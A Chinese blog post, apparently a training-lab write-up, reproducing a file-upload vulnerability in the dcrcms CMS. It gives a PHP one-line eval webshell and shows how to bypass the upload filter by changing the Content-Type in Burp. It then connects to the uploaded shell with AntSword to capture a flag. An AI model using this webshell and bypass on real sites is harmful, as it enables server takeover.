dcrcms 文件上传漏洞

最新推荐文章于 2024-07-10 17:49:24 发布
最新推荐文章于 2024-07-10 17:49:24 发布
阅读量104 收藏
点赞数
分类专栏: 靶场 后门 漏洞复现 文章标签: web web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134065051
版权
漏洞复现 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
靶场
9 篇文章 0 订阅
订阅专栏
后门
6 篇文章 0 订阅
订阅专栏

dcrcms 文件上传漏洞

启动环境

启动靶场得到ip和映射端口
在这里插入图片描述

测试漏洞

  1. 输入http://10.9.47.6:14153/dcr进入后台 账号密码为admin:123456
    在这里插入图片描述
  2. 寻找文件上传漏洞
  • 看到添加新闻里有文件上传我们尝试进行上传
    在这里插入图片描述
  • 写一个php文件里面放入一句话木马
<?php
@eval($_REQUEST[666]);
?>

在这里插入图片描述
3. 将写好的一句话木马文件上传
在这里插入图片描述
显示需要添加新闻类型我们添加一个
在这里插入图片描述
这样就好了我们点击添加新闻
在这里插入图片描述
显示类型不允许可能是把php文件屏蔽了
在这里插入图片描述
我们用bp修改一下文件类型
在这里插入图片描述
把他改为image/png
在这里插入图片描述
这样就上传成功了我们到文件管理器找一下这个文件 文件管理器>uploads>news>当天日期的文件夹里
在这里插入图片描述

在这里插入图片描述
我们点击访问这个文件
在这里插入图片描述
会跳出个其他IP
在这里插入图片描述
我们将他改回靶场的ip和端口进行访问
在这里插入图片描述
用蚁剑进行连接
在这里插入图片描述
在蚁剑可以看到目录我们就可以找到flag了
在这里插入图片描述
进行提交
在这里插入图片描述

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
稻草人企业网站系统
08-16
`.gitattributes`和`.gitignore`是Git版本控制系统相关的文件,前者定义了文件属性,后者则指定在版本控制中忽略的文件或目录。 `composer.json`和`composer.lock`是Composer的配置文件,Composer是PHP的一个依赖...
稻草人企业建站程序 v1.0.0
03-26
稻草人CMS企业建站 1、上目录下的所有文件到空间上 2、用http://域名/install/index.php来安装 用户名及密码:admin/admin 官方网址:http://www.dcrcms.com
dcrcms文件(cnvd-2020-27175)
m0_65150886的博客
01-24 588
稻草人企业站是一款基于PHP+Sqlite/MySQL的开源简单小巧的免费企业网站系统。2.访问http://ip:port/dcr/login.htm,进入登录页面。稻草人企业站1.1.5存在文件漏洞,攻击者可利用漏洞获取服务器控制权。1.访问http://ip:port,出现如下页面,开始实验。5.回到后台首页----->添加新闻。7.点击添加新闻,并通过burp抓包。8.在重发器中,修改文件类型,并发包。10.蚁剑连接,getshell。密 码: 123456。4.填写分类名并添加分类。
web后台登录口令暴力破解及防御
weixin_44023460的博客
01-06 7089
在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件,数据库管理等。前台用户可以自由注册,而后台是网站管理或者维护人员设定,渗透中如果能够拿到后台管理员帐号及密码,则意味着离获取webshell权限更进一步了。 1.1web后台账号及密码获取思路 1.通过sql注入获取后台账号及密码 如果网站存在sql注入漏洞,则可以通过sqlmap等工具进行漏洞测试,通过dump命令来获取整个数据库或者某个表中的数据。 2.通过跨站获取管理员帐
dcrcms 文件漏洞(CNVD-2020-27175)
xy_wjyjw的博客
10-26 224
点击系统管理——文件管理器——uploads——cache——2023_10_27——2310270510021439.php。连接成功后打开虚拟终端,输入dir /tmp命令,就可以找到flag。在bp网站的地址栏输入10.9.47.6:31911/dcr。登录进入后台,点击模板管理——导入模板——选择模板配置文件dcrcms 文件漏洞。回到浏览器发现更新配置成功。打开蚁剑,并添加数据。
漏洞复现-dcrCms-文件】vulfocus/dcrcms-cnvd_2020_27175
10-10 1988
文件】修改文件类型
文件漏洞详解
一个努力学习网安的小牛马
11-16 87
文件漏洞详解
漏洞复现-TypesetterCms-文件ZIP】vulfocus/typesetter-cve_2020_25790
10-10 987
【压缩后门文件
漏洞复现-dedecms-文件】vulfocus/dedecms-cve_2019_8933
10-16 3505
【dedecms-文件】后缀
漏洞复现-EmpireCms-文件】vulfocus/empirecms-cve_2018_18086
10-09 1774
【EmpireCms-文件】帝国建站
稻草人企业站 v1.0.2CMS系统
03-19
将这个文件夹中的所有文件至你的服务器空间上。通常,这可以通过FTP客户端如FileZilla来完成,你需要连接到你的服务器,然后将这些文件逐个或整个文件夹地拖放到指定的Web根目录下。 一旦文件完毕,接下来...
网络安全----防御----防火墙安全策略组网
最新发布
NBbabay的博客
07-10 219
4,办公区分为市场部和研发部,研发部IP地址固定,访问DMZ区使用匿名认证,市场部需要用户绑定Ip地址,访问DMZ区使用免认证, 游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权限,门户网址地址10.0.3.10。5生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织结构,至少包含三个部门,每个部门三个用户,统一密码openlab123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
网 安 云
07-10 383
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
网络防御保护——网络安全概述
智商不在服务区的博客
07-06 908
0day漏洞是指负责应用程序的程序员或供应商所未知的软件缺陷。因为该漏洞未知,所以没有可用的补丁程序。换句话说,该漏洞是由不直接参与项目的人员发现的。术语“0day”是指从发现漏洞到对其进行首次攻击之间的天数。0day漏洞公开后,便称为nday漏洞。0day时间表的工作原理如下:一个人或一个公司创建了一个软件,其中包含一个漏洞,但涉及编程或发行的人员却不知道。在开发人员有机会定位或解决问题之前,有人(除负责软件的人员之外)发现了漏洞。发现该漏洞的人会创建恶意代码来利用该漏洞。该漏洞被释放。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1118
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】实验七(ISA防火墙的规则设置)
Elena's Blog
07-07 1051
(1)将host1的IP地址设置为172.16.学号.学号(2)将host2的IP地址设置为172.16.学号.1学号(3)将防火墙的内网IP地址设置为172.16.学号.250,IP地址设置为192.168.17.1学号(4)在防火墙上配置路由功能,并使内、外网之间能互相PING通(1)(2)(3)(4)
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 266
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 794
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
网络安全筑基篇——XSS、XML、XXE
weixin_55762309的博客
07-10 469
XSS、XXE、XML的区别

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值